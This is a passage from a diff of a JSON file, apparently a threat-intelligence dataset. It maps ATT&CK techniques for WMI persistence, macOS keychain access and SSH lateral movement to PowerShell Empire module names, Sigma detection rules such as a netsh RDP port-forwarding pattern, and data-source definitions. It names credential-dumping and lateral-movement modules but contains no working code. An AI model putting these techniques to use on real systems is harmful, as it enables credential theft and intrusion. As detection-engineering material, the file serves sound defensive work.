"https://attack.mitre.org/techniques/T1084/" + ], + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "author": "Tom Ueltschi (@c_APT_ure)", + "date": "2019/01/12", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selector": { + "EventID": [ + 19, + 20, + 21 + ] + }, + "condition": "selector" + }, + "falsepositives": [ + "exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "level": "high" + }, + { + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "experimental", + "description": "Detects WMI command line event consumers", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 7, + "Image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "ImageLoaded": "wbemcons.dll" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high" + }, + { + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "experimental", + "description": "Detects file writes of WMI script event consumer", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "Image": "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high" + }, + { + "title": "WMI Backdoor Exchange Transport 
Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "experimental", + "description": "Detects a WMi backdoor in Exchange Transport Agents via WMi event filters", + "author": "Florian Roth", + "date": "2019/10/11", + "references": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "tags": [ + "attack.persistence", + "attack.t1084" + ], + "detection": { + "selection": { + "ParentImage": "*\\EdgeTransport.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + [ + "5861", + "WMI Objects" + ], + [ + "5861", + "WMI Objects" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + { + "technique_id": "T1142", + "command_list": [ + "python/collection/osx/keychaindump", + "python/collection/osx/keychaindump_chainbreaker", + "python/collection/osx/keychaindump_decrypt" + ], + "commands": [ + { + "command": "python/collection/osx/keychaindump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keychaindump_chainbreaker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keychaindump_decrypt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/collection/osx/keychaindump", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", 
+ "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump\": [\"T1142\"]," + }, + { + "Empire Module": "python/collection/osx/keychaindump_chainbreaker", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", + "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump_chainbreaker\": [\"T1142\"]," + }, + { + "Empire Module": "python/collection/osx/keychaindump_decrypt", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", + "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump_decrypt\": [\"T1142\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1021", + "command_list": [ + "python/lateral_movement/multi/ssh_command", + "python/lateral_movement/multi/ssh_launcher" + ], + "commands": [ + { + "command": "python/lateral_movement/multi/ssh_command", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/lateral_movement/multi/ssh_launcher", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/lateral_movement/multi/ssh_command", + "ATT&CK Technique #1": "T1021", + "ATT&CK Technique #2": "", + "Technique": "Remote Services", + "Concatenate for Python Dictionary": "\"python/lateral_movement/multi/ssh_command\": [\"T1021\"]," + }, + { + "Empire Module": "python/lateral_movement/multi/ssh_launcher", + "ATT&CK Technique #1": "T1021", + "ATT&CK Technique #2": "", + "Technique": "Remote Services", + "Concatenate for Python Dictionary": "\"python/lateral_movement/multi/ssh_launcher\": [\"T1021\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Netsh RDP Port Forwarding", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", 
+ "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.t1021", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "netsh i* p*=3389 c*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "high" + }, + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "21", + " 23", + " 25", + " 41", + "RDP Logs" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "21", + " 23", + " 25", + " 41", + "RDP Logs" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ 
+ "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts 
(Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + 
